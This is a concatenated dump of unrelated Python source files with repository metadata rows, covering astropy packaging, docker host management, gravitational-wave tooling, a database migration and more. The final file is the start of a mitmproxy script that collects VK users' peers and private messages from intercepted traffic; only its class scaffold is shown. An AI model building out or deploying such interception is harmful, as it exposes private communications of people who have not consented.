# Get some values from the setup.cfg
from distutils import config
conf = config.ConfigParser()
conf.read(['setup.cfg'])
metadata = dict(conf.items('metadata'))
PACKAGENAME = metadata.get('package_name', 'packagename')
DESCRIPTION = metadata.get('description', 'Astropy affiliated package')
AUTHOR = metadata.get('author', '')
AUTHOR_EMAIL = metadata.get('author_email', '')
LICENSE = metadata.get('license', 'unknown')
URL = metadata.get('url', 'http://astropy.org')
# Get the long description from the package's docstring
__import__(PACKAGENAME)
package = sys.modules[PACKAGENAME]
LONG_DESCRIPTION = package.__doc__
# Store the package name in a built-in variable so it's easy
# to get from other parts of the setup infrastructure
builtins._ASTROPY_PACKAGE_NAME_ = PACKAGENAME
# VERSION should be PEP386 compatible (http://www.python.org/dev/peps/pep-0386)
VERSION = '0.1.dev'
# Indicates if this version is a release version
RELEASE = 'dev' not in VERSION
if not RELEASE:
VERSION += get_git_devstr(False)
# Populate the dict of setup command overrides; this should be done before
# invoking any other functionality from distutils since it can potentially
# modify distutils' behavior.
cmdclassd = register_commands(PACKAGENAME, VERSION, RELEASE)
# Adjust the compiler in case the default on this platform is to use a
# broken one.
adjust_compiler(PACKAGENAME)
# Freeze build information in version.py
generate_version_py(PACKAGENAME, VERSION, RELEASE,
get_debug_option(PACKAGENAME))
# Treat everything in scripts except README.rst as a script to be installed
scripts = [fname for fname in glob.glob(os.path.join('scripts', '*'))
if os.path.basename(fname) != 'README.rst']
# Get configuration information from all of the various subpackages.
# See the docstring for setup_helpers.update_package_files for more
# details.
package_info = get_package_info()
# Add the project-global data
package_info['package_data'].setdefault(PACKAGENAME, [])
package_info['package_data'][PACKAGENAME].append('data/*')
# Define entry points for command-line scripts
entry_points = {}
entry_points['console_scripts'] = [
'astropy-package-template-example = packagename.example_mod:main',
]
# Include all .c files, recursively, including those generated by
# Cython, since we can not do this in MANIFEST.in with a "dynamic"
# directory name.
c_files = []
for root, dirs, files in os.walk(PACKAGENAME):
for filename in files:
if filename.endswith('.c'):
c_files.append(
os.path.join(
os.path.relpath(root, PACKAGENAME), filename))
package_info['package_data'][PACKAGENAME].extend(c_files)
setup(name=PACKAGENAME,
version=VERSION,
description=DESCRIPTION,
scripts=scripts,
requires=['astropy'],
install_requires=['astropy'],
provides=[PACKAGENAME],
author=AUTHOR,
author_email=AUTHOR_EMAIL,
license=LICENSE,
url=URL,
long_description=LONG_DESCRIPTION,
cmdclass=cmdclassd,
zip_safe=False,
use_2to3=True,
entry_points=entry_points,
**package_info
)
| bsd-3-clause | 1,335,141,643,837,184,800 | 31.284483 | 79 | 0.722296 | false | 3.667973 | false | false | false |
nfqsolutions/pylm-registry | pylm/registry/clients/logs.py | 1 | 1616 | import json
from urllib import parse
from tornado.httpclient import HTTPClient
class LogClient(object):
"""
Client to send and retrieve logs
"""
def __init__(self, uri, cluster):
self.uri = uri
self.cluster = cluster
def send(self, text):
"""
Send a log line to the registry
:param text: Text of the log line
"""
arguments = {
'cluster': self.cluster,
}
client = HTTPClient()
client.fetch('{}/logs?{}'.format(
self.uri, parse.urlencode(arguments)),
method='POST',
body=text
)
def download(self, fr=None, to=None):
"""
        Download the log lines, optionally filtered by time
:param fr: datetime. Log lines from
:param to: datetime. Log lines to
:return: A list with dicts
"""
arguments = {
'cluster': self.cluster
}
if fr:
arguments['fr'] = fr
if to:
arguments['to'] = to
client = HTTPClient()
response = client.fetch('{}/logs?{}'.format(
self.uri, parse.urlencode(arguments)),
)
return json.loads(response.body.decode('utf-8'))
def view(self, fr=None, to=None):
"""
Pretty print the log lines
:param fr: datetime. Log lines from
:param to: datetime. Log lines to
:return:
"""
for log_line in self.download(fr, to):
print(log_line['when'], log_line['text'])
def delete(self):
raise NotImplementedError() | agpl-3.0 | 1,886,138,002,118,353,000 | 22.779412 | 59 | 0.525371 | false | 4.367568 | false | false | false |
BeyondTheClouds/enoslib | enoslib/docker.py | 1 | 5041 | """Manage remote docker containers as first class citizens.
A possible workflow would be to start your containers using the method of
your choice and build the list of available dockers using the
:py:func:`enoslib.docker.get_dockers` function.
A ``DockerHost`` is a specialization of a ``Host`` and thus can be fed into
any Host related operations (play_on, run_command...) [#docker0]_. Hosts
datastructure in enoslib are tied somehow to Ansible. DockerHost is shaped so
that the docker connection plugin can run. So we inject at build time the
necessary connection options (``ansible_connection=docker``,
``ansible_docker_extra_args="-H <remote_docker>"``).
Connections to remote docker daemons can be made using different
protocols [#docker1]_.
- Using ssh: requires ssh access to the remote host but
can go through a bastion host if .ssh/config is configured correctly.
Note that the docker client must be available.
- Using raw tcp: requires being able to reach the remote docker daemon (e.g. be inside
g5k). Note that in this case the remote socket must be exposed.
Additionally, the structure is compatible with mitogen and its delegation model
[#docker2]_ which can improve performance. Note that the facts from the
host machines (where the docker daemon runs) need to be gathered. One way to
ensure this is to explicitly gather the facts from such hosts.
.. topic:: Links
.. [#docker0] https://en.wikipedia.org/wiki/Liskov_substitution_principle
.. [#docker1] https://docs.docker.com/engine/reference/commandline/dockerd
.. [#docker2] https://mitogen.networkgenomics.com/ansible_detailed.html
Example:
.. literalinclude:: examples/advanced_docker.py
:language: python
:linenos:
"""
import json
from typing import List, Mapping, Optional
from enoslib.api import run_command, get_hosts
from enoslib.objects import Host, Roles
class DockerHost(Host):
"""A kind of host reachable using docker protocol.
Args:
        alias: **unique** name across the deployment
        container_name: name of the docker container on the remote host
host : the host where the container can be found
proto: how to connect to the remote host
(DockerHost.PROTO_TCP/DockerHost.PROTO_SSH)
[Default DockerHost.PROTO_SSH]
state: dict representing the state as returned by ``docker inspect``
"""
PROTO_SSH = "ssh"
PROTO_TCP = "tcp"
def __init__(
self,
alias: str,
container_name: str,
host: Host,
proto: Optional[str] = None,
state: Optional[Mapping] = None,
):
self.remote = host.address
if proto is None:
proto = self.PROTO_SSH
self.proto = proto
if self.proto not in [self.PROTO_SSH, self.PROTO_TCP]:
raise ValueError(f"proto must be in {[self.PROTO_SSH, self.PROTO_TCP]}")
if host.user:
self.remote = f"{host.user}@{host.address}"
else:
self.remote = f"{host.address}"
        # Optionally keep the internal state (returned by docker inspect).
        # Note that currently we don't provide any consistency guarantee.
self._state = {} if state is None else state
super().__init__(
container_name,
alias=alias,
user=host.user,
keyfile=host.keyfile,
extra=dict(
ansible_connection="docker",
ansible_docker_extra_args=f"-H {proto}://{self.remote}",
mitogen_via=f"{host.user}@{host.address}",
),
)
@classmethod
def from_state(cls, state: Mapping, host: Host):
"""Build a DockerHost from a state json as returned by docker inspect."""
container_name = state["Name"]
alias = f"{container_name}-{host.alias}"
return cls(alias, container_name, host, state=state)
def get_dockers(
roles: Roles, pattern_hosts: str = "*", container_name: str = ".*"
) -> List[DockerHost]:
"""Get remote dockers hosts.
Args:
roles: the roles as returned by
:py:meth:`enoslib.infra.provider.Provider.init`
pattern_hosts: pattern to describe ansible hosts to target.
see https://docs.ansible.com/ansible/latest/intro_patterns.html
        container_name: name of the containers to look for. Regexps are
            supported as in the filter option of docker inspect.
Returns:
List of DockerHost matching the passed container_name
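
    Example (sketch; assumes ``roles`` comes from a provider's ``init()``):

    .. code-block:: python

        nginx_dockers = get_dockers(roles, container_name="nginx")
        for d in nginx_dockers:
            print(d.alias)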
"""
docker_hosts = []
result = run_command(
f"docker ps -q --filter name={container_name} | xargs docker inspect",
pattern_hosts=pattern_hosts,
roles=roles,
on_error_continue=True,
)
# parsing the results
for alias, r in result["ok"].items():
dockers = json.loads(r["stdout"])
host = get_hosts(roles, alias)[0]
for docker in dockers:
docker_host = DockerHost.from_state(docker, host)
docker_hosts.append(docker_host)
return docker_hosts | gpl-3.0 | -5,821,203,870,560,577,000 | 36.073529 | 84 | 0.652252 | false | 4.026358 | false | false | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/scripts/scramble/scripts/DRMAA_python-macosx.py | 1 | 1552 | import os, sys, shutil
if "SGE_ROOT" not in os.environ:
print "main(): Please set SGE_ROOT to the path of your SGE installation"
print "main(): before scrambling DRMAA_python"
sys.exit(1)
# change back to the build dir
if os.path.dirname( sys.argv[0] ) != "":
os.chdir( os.path.dirname( sys.argv[0] ) )
# find setuptools
sys.path.append( os.path.join( '..', '..', '..', 'lib' ) )
from scramble_lib import *
tag = get_tag() # get the tag
clean() # clean up any existing stuff (could happen if you run scramble.py by hand)
# patch
file = "setup.py"
print "main(): Patching", file
if not os.access( "%s.orig" %file, os.F_OK ):
shutil.copyfile( file, "%s.orig" %file )
i = open( "%s.orig" %file, "r" )
o = open( file, "w" )
for line in i.readlines():
if line == 'SGE6_ROOT="/scratch_test02/SGE6"\n':
line = 'SGE6_ROOT="%s"\n' % os.environ["SGE_ROOT"]
if line.startswith('link_args ='):
line = 'link_args = [ "-L%s" % os.path.join(SGE6_ROOT, "lib", SGE6_ARCH), "-ldrmaa" ]\n'
print >>o, line,
i.close()
o.close()
# build
me = sys.argv[0]
sys.argv = [ me ]
sys.argv.append( "build" )
execfile( "setup.py", globals(), locals() )
# fix _cDRMAA.so rpath
so = "build/lib.%s-%s/_cDRMAA.so" % ( pkg_resources.get_platform(), sys.version[:3] )
libdrmaa = os.path.join(SGE6_ROOT, "lib", SGE6_ARCH, "libdrmaa.dylib.1.0" )
os.system( "install_name_tool -change libdrmaa.dylib.1.0 %s %s" % ( libdrmaa, so ) )
# package
sys.argv = [ me ]
sys.argv.append( "bdist_egg" )
execfile( "setup.py", globals(), locals() )
| gpl-3.0 | -6,921,328,556,642,751,000 | 30.673469 | 97 | 0.619201 | false | 2.561056 | false | false | false |
demarlik01/szcal | app.py | 1 | 1040 | from flask import Flask
from flask import request
from flask import jsonify
from flask import Response
from flask_cors import CORS
from database import session
from models import Address
from urllib import parse
from utils import replace_if_short_address
app = Flask(__name__)
CORS(app)
@app.route('/cj/secluded_place')
def cj_secluded_place():
address_args = request.args.get('address')
if address_args:
trimmed_address = parse.unquote(address_args).replace(' ', '')
address = replace_if_short_address(trimmed_address)
result = session.query(Address).filter(Address.trimmed_address == address).first()
if result is not None:
result_dict = {
'zipcode': result.zipcode,
'address': result.address,
'additional_fee': result.add_fee,
}
return jsonify(result_dict)
else:
return Response(status=404)
else:
return Response(status=400)
if __name__ == '__main__':
app.run(debug=True)
| mit | -1,199,521,550,846,967,300 | 27.888889 | 90 | 0.638462 | false | 4 | false | false | false |
annahs/atmos_research | LEO_2D_histos_from_db.py | 1 | 3992 | import sys
import os
import datetime
import pickle
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.colors as colors
from pprint import pprint
import sqlite3
import calendar
from datetime import datetime
#id INTEGER PRIMARY KEY AUTOINCREMENT,
#sp2b_file TEXT,
#file_index INT,
#instr TEXT,
#instr_locn TEXT,
#particle_type TEXT,
#particle_dia FLOAT,
#unix_ts_utc FLOAT,
#actual_scat_amp FLOAT,
#actual_peak_pos INT,
#FF_scat_amp FLOAT,
#FF_peak_pos INT,
#FF_gauss_width FLOAT,
#zeroX_to_peak FLOAT,
#LF_scat_amp FLOAT,
#incand_amp FLOAT,
#lag_time_fit_to_incand FLOAT,
#LF_baseline_pct_diff FLOAT,
#rBC_mass_fg FLOAT,
#coat_thickness_nm FLOAT,
#zero_crossing_posn FLOAT,
#UNIQUE (sp2b_file, file_index, instr)
#connect to database
conn = sqlite3.connect('C:/projects/dbs/SP2_data.db')
c = conn.cursor()
instrument = 'UBCSP2'
instrument_locn = 'WHI'
type_particle = 'incand'
start_date = datetime.strptime('20120401','%Y%m%d')
end_date = datetime.strptime('20120531','%Y%m%d')
lookup_file = 'C:/Users/Sarah Hanna/Documents/Data/WHI long term record/coatings/lookup_tables/coating_lookup_table_WHI_2012_UBCSP2.lupckl'
rBC_density = 1.8
incand_sat = 3750
LF_max = 45000 #above this is unreasonable
lookup = open(lookup_file, 'r')
lookup_table = pickle.load(lookup)
lookup.close()
min_rBC_mass = 1.63#120 2.6-#140 3.86-#160nm 0.25
max_rBC_mass = 2.6#140 3.86-160 5.5-#180nm 10.05
VED_min = 65
VED_max = 220
scat_lim = 100
begin_data = calendar.timegm(start_date.timetuple())
end_data = calendar.timegm(end_date.timetuple())
data = []
particles=0
no_scat=0
no_scat_110 =0
fit_failure=0
early_evap=0
early_evap_110=0
flat_fit=0
LF_high=0
for row in c.execute('''SELECT rBC_mass_fg, coat_thickness_nm, unix_ts_utc, LF_scat_amp, LF_baseline_pct_diff, sp2b_file, file_index, instr,actual_scat_amp
FROM SP2_coating_analysis
WHERE instr=? and instr_locn=? and particle_type=? and rBC_mass_fg>=? and rBC_mass_fg<? and unix_ts_utc>=? and unix_ts_utc<?''',
(instrument,instrument_locn,type_particle, min_rBC_mass, max_rBC_mass, begin_data,end_data)):
particles+=1
rBC_mass = row[0]
coat_thickness = row[1]
event_time = datetime.utcfromtimestamp(row[2])
LEO_amp = row[3]
LF_baseline_pctdiff = row[4]
file = row[5]
index = row[6]
instrt = row[7]
meas_scat_amp = row[8]
rBC_VED = (((rBC_mass/(10**15*rBC_density))*6/3.14159)**(1/3.0))*10**7 #VED in nm with 10^15fg/g and 10^7nm/cm
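	# Sanity check on the VED formula above (editorial note): converting the rBC
	# mass in fg to a volume with the 1.8 g/cm^3 density and taking the diameter
	# of the equivalent sphere gives the volume-equivalent diameter in nm; e.g.
	# ~2.6 fg corresponds to roughly 140 nm, matching the inline comments next to
	# min_rBC_mass/max_rBC_mass.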
if meas_scat_amp < 6:
no_scat +=1
if rBC_VED > scat_lim:
no_scat_110+=1
data.append([rBC_VED,coat_thickness])
if LEO_amp == 0.0 and LF_baseline_pctdiff == None and meas_scat_amp >= 6:
early_evap +=1
if rBC_VED > scat_lim:
early_evap_110 +=1
if LEO_amp == -2:
early_evap +=1
if rBC_VED > scat_lim:
early_evap_110 +=1
if LEO_amp == -1:
fit_failure +=1
if LEO_amp == 0.0 and LF_baseline_pctdiff != None:
flat_fit +=1
if LEO_amp > LF_max:
LF_high +=1
if LEO_amp > 0:
data.append([rBC_VED,coat_thickness])
print '# of particles', particles
print 'no_scat', no_scat
print 'no_scat_110', no_scat_110
print 'fit_failure', fit_failure
print 'early_evap', early_evap
print 'early_evap_110', early_evap_110
print 'flat_fit', flat_fit
print 'LF_high', LF_high
evap_pct = (early_evap)*100.0/particles
evap_pct_110 = (early_evap_110)*100.0/particles
no_scat_pct = (no_scat)*100.0/particles
no_scat_pct_110 = no_scat_110*100./particles
print evap_pct, evap_pct_110, no_scat_pct,no_scat_pct_110
rBC_VEDs = [row[0] for row in data]
coatings = [row[1] for row in data]
median_coat = np.median (coatings)
print 'median coating',median_coat
#####hexbin coat vs core###
fig = plt.figure()
ax = fig.add_subplot(111)
#x_limits = [0,250]
#y_limits = [0,250]
#h = plt.hexbin(rBC_VEDs, coatings, cmap=cm.jet,gridsize = 50, mincnt=1)
hist = plt.hist(coatings, bins=50)
plt.ylabel('frequency')
plt.xlabel('Coating Thickness (nm)')
#cb = plt.colorbar()
#cb.set_label('frequency')
plt.show()
| mit | -1,434,911,381,491,213,300 | 22.904192 | 155 | 0.693136 | false | 2.420861 | false | false | false |
moble/scri | scri/__init__.py | 1 | 7034 | # Copyright (c) 2020, Michael Boyle
# See LICENSE file for details: <https://github.com/moble/scri/blob/master/LICENSE>
"""Module for operating on gravitational waveforms in various forms
Classes
-------
WaveformBase : Base class
This is probably not needed directly; it is just used for inheritance by other objects.
WaveformModes: Complex spin-weighted spherical-harmonic modes
The modes must include all `m` values for a range of `ell` values. This is the "classic" version of a WaveformBase
object we might normally think of.
WaveformGrid: Complex quantity evaluated along world lines of grid points on the sphere
To perform translations or boosts, we need to transform to physical space, along a series of selected world lines
distributed evenly across the sphere. These values may need to be interpolated to new time values, and they will
presumably need to be transformed back to `WaveformModes`.
WaveformInDetector: Real quantities as observed in an inertial detector
Detectors only measure one polarization, so they deal with real quantities. Also, data is measured in evenly
spaced time steps. This object can be created from a `WaveformModes` object.
WaveformInDetectorFT: (Complex) Fourier transform of a `WaveformInDetector`
This contains only the positive-frequency values since the transformed data is real.
"""
import sys
import functools
import numba
from ._version import __version__
jit = functools.partial(numba.njit, cache=True)
jitclass = numba.experimental.jitclass
def version_info():
"""Show version information about this module and various dependencies"""
import spherical_functions
import quaternion
import scipy
import numba
import numpy
versions = "\n".join(
[
f"scri.__version__ = {__version__}",
f"spherical_functions.__version__ = {spherical_functions.__version__}",
f"quaternion.__version__ = {quaternion.__version__}",
f"scipy.__version__ = {scipy.__version__}",
f"numba.__version__ = {numba.__version__}",
f"numpy.__version__ = {numpy.__version__}",
]
)
return versions
# The speed of light is, of course, defined to be exact:
speed_of_light = 299792458.0 # m/s
# The value of the solar mass parameter G*M_sun is known to higher accuracy than either of its factors. The value
# here is taken from the publication "2015 Selected Astronomical Constants", which can be found at
# <http://asa.usno.navy.mil/SecK/Constants.html>. This is (one year more current than, but numerically the same as)
# the source cited by the Particle Data Group. It is given as 1.32712440041e20 m^3/s^2 in the TDB (Barycentric
# Dynamical Time) time scale, which seems to be the more relevant one, and looks like the more standard one for LIGO.
# Dividing by the speed of light squared, we get the mass of the sun in meters; dividing again, we get the mass of
# the sun in seconds:
m_sun_in_meters = 1476.62503851 # m
m_sun_in_seconds = 4.92549094916e-06 # s
# By "IAU 2012 Resolution B2", the astronomical unit is defined to be exactly 1 au = 149597870700 m. The parsec
# is, in turn, defined as "The distance at which 1 au subtends 1 arc sec: 1 au divided by pi/648000." Thus, the
# future-proof value of the parsec in meters is
parsec_in_meters = 3.0856775814913672789139379577965e16 # m
FrameType = [UnknownFrameType, Inertial, Coprecessing, Coorbital, Corotating] = range(5)
FrameNames = ["UnknownFrameType", "Inertial", "Coprecessing", "Coorbital", "Corotating"]
DataType = [UnknownDataType, psi0, psi1, psi2, psi3, psi4, sigma, h, hdot, news, psin] = range(11)
DataNames = ["UnknownDataType", "Psi0", "Psi1", "Psi2", "Psi3", "Psi4", "sigma", "h", "hdot", "news", "psin"]
SpinWeights = [sys.maxsize, 2, 1, 0, -1, -2, 2, -2, -2, -2, sys.maxsize]
ConformalWeights = [sys.maxsize, 2, 1, 0, -1, -2, 1, 0, -1, -1, -3]
RScaling = [sys.maxsize, 5, 4, 3, 2, 1, 2, 1, 1, 1, 0]
MScaling = [sys.maxsize, 2, 2, 2, 2, 2, 0, 0, 1, 1, 2]
DataNamesLaTeX = [
r"\mathrm{unknown data type}",
r"\psi_0",
r"\psi_1",
r"\psi_2",
r"\psi_3",
r"\psi_4",
r"\sigma",
r"h",
r"\dot{h}",
r"\mathrm{n}",
r"\psi_n",
]
# It might also be worth noting that:
# - the radius `r` has spin weight 0 and boost weight -1
# - a time-derivative `d/du` has spin weight 0 and boost weight -1
# - \eth has spin weight +1; \bar{\eth} has spin weight -1
# - \eth in the GHP formalism has boost weight 0
# - \eth in the original NP formalism has undefined boost weight
# - It seems like `M` should have boost weight 1, but I'll have to think about the implications
# Set up the WaveformModes object, by adding some methods
from .waveform_modes import WaveformModes
from .mode_calculations import (
LdtVector,
LVector,
LLComparisonMatrix,
LLMatrix,
LLDominantEigenvector,
angular_velocity,
corotating_frame,
inner_product,
)
from .flux import (
energy_flux,
momentum_flux,
angular_momentum_flux,
poincare_fluxes,
boost_flux
)
WaveformModes.LdtVector = LdtVector
WaveformModes.LVector = LVector
WaveformModes.LLComparisonMatrix = LLComparisonMatrix
WaveformModes.LLMatrix = LLMatrix
WaveformModes.LLDominantEigenvector = LLDominantEigenvector
WaveformModes.angular_velocity = angular_velocity
from .rotations import (
rotate_decomposition_basis,
rotate_physical_system,
to_coprecessing_frame,
to_corotating_frame,
to_inertial_frame,
align_decomposition_frame_to_modes,
)
WaveformModes.rotate_decomposition_basis = rotate_decomposition_basis
WaveformModes.rotate_physical_system = rotate_physical_system
WaveformModes.to_coprecessing_frame = to_coprecessing_frame
WaveformModes.to_corotating_frame = to_corotating_frame
WaveformModes.to_inertial_frame = to_inertial_frame
WaveformModes.align_decomposition_frame_to_modes = align_decomposition_frame_to_modes
WaveformModes.energy_flux = energy_flux
WaveformModes.momentum_flux = momentum_flux
WaveformModes.angular_momentum_flux = angular_momentum_flux
WaveformModes.boost_flux = boost_flux
WaveformModes.poincare_fluxes = poincare_fluxes
from .waveform_grid import WaveformGrid
# from .waveform_in_detector import WaveformInDetector
from .extrapolation import extrapolate
from .modes_time_series import ModesTimeSeries
from .asymptotic_bondi_data import AsymptoticBondiData
from . import sample_waveforms, SpEC, LVC, utilities
__all__ = [
"WaveformModes",
"WaveformGrid",
"WaveformInDetector",
"FrameType",
"UnknownFrameType",
"Inertial",
"Coprecessing",
"Coorbital",
"Corotating",
"FrameNames",
"DataType",
"UnknownDataType",
"psi0",
"psi1",
"psi2",
"psi3",
"psi4",
"sigma",
"h",
"hdot",
"news",
"psin",
"DataNames",
"DataNamesLaTeX",
"SpinWeights",
"ConformalWeights",
"RScaling",
"MScaling",
"speed_of_light",
"m_sun_in_meters",
"m_sun_in_seconds",
"parsec_in_meters",
]
| mit | -5,533,757,833,371,105,000 | 35.071795 | 119 | 0.707279 | false | 3.270107 | false | false | false |
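# Illustrative sketch (not part of the scri source above): the module binds
# `jit = functools.partial(numba.njit, cache=True)`, so helpers decorated with
# @jit are numba-compiled with on-disk caching on first use.  A minimal
# standalone analogue of that decorator pattern:
import functools
import numba

jit = functools.partial(numba.njit, cache=True)

@jit
def dot3(a, b):
    # plain numeric code that numba compiles in nopython mode on first call
    return a[0] * b[0] + a[1] * b[1] + a[2] * b[2]

# dot3((1.0, 2.0, 3.0), (4.0, 5.0, 6.0)) -> 32.0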
quarkslab/irma | frontend/extras/migration/versions/eb7141efd75a_version_1_3_0.py | 1 | 6216 | """version 1.3.0
Revision ID: eb7141efd75a
Revises: 430a70c8aa21
Create Date: 2016-01-06 13:38:46.918409
"""
# revision identifiers, used by Alembic.
revision = 'eb7141efd75a'
down_revision = '430a70c8aa21'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from irma.common.utils.utils import UUID
from sqlalchemy import Column, Integer, ForeignKey, String, BigInteger, Numeric
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.orm import relationship, backref
from api.common.models import tables_prefix
Base = declarative_base()
class File(Base):
__tablename__ = '{0}file'.format(tables_prefix)
# Fields
id = Column(Integer, primary_key=True)
sha256 = Column(String)
sha1 = Column(String)
md5 = Column(String)
timestamp_first_scan = Column(Numeric)
timestamp_last_scan = Column(Numeric)
size = Column(BigInteger)
mimetype = Column(String)
path = Column(String)
class FileWeb(Base):
__tablename__ = '{0}fileWeb'.format(tables_prefix)
# Fields
id = Column(Integer, primary_key=True)
external_id = Column(String)
id_file = Column(Integer)
name = Column(String)
path = Column(String)
id_scan = Column(Integer)
id_parent = Column(Integer)
class FileWebMigration(Base):
__tablename__ = '{0}fileWeb'.format(tables_prefix)
__table_args__ = {'extend_existing': True}
# Fields
id = Column(Integer, primary_key=True)
external_id = Column(String)
id_file = Column(Integer)
name = Column(String)
path = Column(String)
id_scan = Column(Integer)
id_parent = Column(Integer)
scan_file_idx = Column(Integer)
def upgrade():
bind = op.get_bind()
session = scoped_session(sessionmaker(autocommit=False, autoflush=False,
bind=bind))
op.add_column('irma_file', sa.Column('mimetype',
sa.String(),
nullable=True))
op.add_column('irma_fileWeb', sa.Column('external_id',
sa.String(length=36),
nullable=True))
op.add_column('irma_fileWeb', sa.Column('id_parent',
sa.Integer(),
nullable=True))
op.add_column('irma_fileWeb', sa.Column('path',
sa.String(length=255),
nullable=True))
# Create external_id as new uuid
for fileweb in session.query(FileWeb).all():
if fileweb.external_id is None:
fileweb.external_id = UUID.generate()
session.commit()
# Now that all data are fixed set column to non nullable
op.alter_column('irma_fileWeb', 'external_id', nullable=False)
op.create_index(op.f('ix_irma_fileWeb_external_id'),
'irma_fileWeb',
['external_id'],
unique=False)
op.drop_constraint(u'irma_fileWeb_id_scan_scan_file_idx_key',
'irma_fileWeb',
type_='unique')
op.create_unique_constraint(None,
'irma_fileWeb',
['external_id'])
op.create_foreign_key(None,
'irma_fileWeb',
'irma_file',
['id_parent'],
['id'])
op.drop_column('irma_fileWeb', 'scan_file_idx')
op.add_column('irma_scan', sa.Column('force',
sa.Boolean(),
nullable=True))
op.add_column('irma_scan', sa.Column('mimetype_filtering',
sa.Boolean(),
nullable=True))
op.add_column('irma_scan', sa.Column('probelist',
sa.String(),
nullable=True))
op.add_column('irma_scan', sa.Column('resubmit_files',
sa.Boolean(),
nullable=True))
op.add_column('irma_tag', sa.Column('text',
sa.String(),
nullable=False))
op.drop_column('irma_tag', 'name')
def downgrade():
bind = op.get_bind()
session = scoped_session(sessionmaker(autocommit=False, autoflush=False,
bind=bind))
op.add_column('irma_tag', sa.Column('name',
sa.VARCHAR(),
autoincrement=False,
nullable=False))
op.drop_column('irma_tag', 'text')
op.drop_column('irma_scan', 'resubmit_files')
op.drop_column('irma_scan', 'probelist')
op.drop_column('irma_scan', 'mimetype_filtering')
op.drop_column('irma_scan', 'force')
op.add_column('irma_fileWeb', sa.Column('scan_file_idx',
sa.INTEGER(),
autoincrement=False,
nullable=True))
# Create scan_file_idx autoincrement per scan
last_id_scan = None
scan_idx = 0
for fileweb in session.query(FileWebMigration).all():
if last_id_scan != fileweb.id_scan:
last_id_scan = fileweb.id_scan
scan_idx = 0
if fileweb.scan_file_idx is None:
fileweb.scan_file_idx = scan_idx
        scan_idx += 1
    # flush the regenerated scan_file_idx values before restoring the unique constraint
    session.commit()
op.create_unique_constraint(u'irma_fileWeb_id_scan_scan_file_idx_key',
'irma_fileWeb',
['id_scan', 'scan_file_idx'])
op.drop_index(op.f('ix_irma_fileWeb_external_id'),
table_name='irma_fileWeb')
op.drop_column('irma_fileWeb', 'path')
op.drop_column('irma_fileWeb', 'id_parent')
op.drop_column('irma_fileWeb', 'external_id')
op.drop_column('irma_file', 'mimetype')
| apache-2.0 | -4,304,994,386,734,047,000 | 36.221557 | 79 | 0.519466 | false | 4.060091 | false | false | false |
barneygale/cedar | cedar/spiral.py | 1 | 1117 | square = 16 * 25
class Spiral:
@classmethod
def spiral(cls, radius, start=(0,0)):
clip1 = (2*radius - 1)//square
clip2 = max(0, radius - square//2)
offset1 = (clip1 % 2) * square//2
for p in cls.spiral_inner(pow(clip1+1, 2)):
yield tuple(
v + # start co-ordinate
max(-clip2, # clamp low
min(clip2, # clamp high
offset1 + # apply offset for even-numbered grids
w * square)) # operate in steps of square
for v, w in zip(start, p)) # zip current spiral coords with start coords
@classmethod
def spiral_inner(cls, m):
yield (0, 0)
m -= 1
d = lambda a: (0, 1, 0, -1)[a % 4]
x = z = 0
i = 2
while m > 0:
for j in range(i >> 1):
x += d(i)
z += d(i+1)
yield (x, z)
m -= 1
if m == 0:
break
i += 1 | mit | 1,341,538,299,758,088,200 | 30.055556 | 90 | 0.385855 | false | 3.865052 | false | false | false |
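# Illustrative usage sketch (not part of the cedar source above): Spiral.spiral
# is a generator of grid-aligned (x, z) coordinates, stepping in units of
# `square` (= 400) blocks, spiralling outward from `start` and clamped to stay
# roughly within the requested radius.  Assuming the Spiral class above is in scope:
for point in Spiral.spiral(radius=600, start=(1000, -2000)):
    print(point)  # yields 9 points for this radius, beginning at (1000, -2000)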
schleichdi2/OPENNFR-6.1-CORE | opennfr-openembedded-core/scripts/lib/wic/utils/runner.py | 1 | 1774 | #!/usr/bin/env python -tt
#
# Copyright (c) 2011 Intel, Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; version 2 of the License
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
import subprocess
from wic import WicError
def runtool(cmdln_or_args):
""" wrapper for most of the subprocess calls
input:
cmdln_or_args: can be both args and cmdln str (shell=True)
return:
rc, output
"""
if isinstance(cmdln_or_args, list):
cmd = cmdln_or_args[0]
shell = False
else:
import shlex
cmd = shlex.split(cmdln_or_args)[0]
shell = True
sout = subprocess.PIPE
serr = subprocess.STDOUT
try:
process = subprocess.Popen(cmdln_or_args, stdout=sout,
stderr=serr, shell=shell)
sout, serr = process.communicate()
# combine stdout and stderr, filter None out and decode
out = ''.join([out.decode('utf-8') for out in [sout, serr] if out])
except OSError as err:
if err.errno == 2:
# [Errno 2] No such file or directory
raise WicError('Cannot run command: %s, lost dependency?' % cmd)
else:
raise # relay
return process.returncode, out
| gpl-2.0 | 1,398,075,700,761,582,800 | 33.115385 | 76 | 0.651635 | false | 3.942222 | false | false | false |
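# Illustrative usage sketch (not part of the wic source above): runtool accepts
# either an argv list (executed directly) or a single command string (executed
# through a shell) and returns (returncode, combined stdout+stderr as text).
rc, out = runtool(['ls', '-l', '/tmp'])       # list form  -> shell=False
rc, out = runtool('ls -l /tmp | wc -l')       # string form -> shell=True
if rc != 0:
    print('command failed: %s' % out)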
infosec-216/alice | vk_filter.py | 1 | 12539 | import logging
import time
import cStringIO
from PIL import Image
from libmproxy.protocol.http import decoded
import re
import urllib # Russian messages support
from sets import Set
logging.basicConfig(filename="/root/mitm.log",level=logging.DEBUG)
class VK_user:
def __init__(self):
self.id = ""
self.peers = {}
self.messages = []
def __repr__(self):
s = "\n"
s += "User vk id = " + str(self.id) + "\n"
for peer in self.peers.keys():
s += "\tpeer " + peer + ": "
for hs in list(self.peers[peer]):
s += hs + " | "
s += "\n"
s += "\n"
s += "| toUser".ljust(20)+"| Topic".ljust(20)+"| Message".ljust(20)+'\n'
for m in self.messages:
s += str(m[1]).ljust(20) + str(m[2]).ljust(20) + str(m[0]).ljust(20) + "\n"
s += "\n"
return s
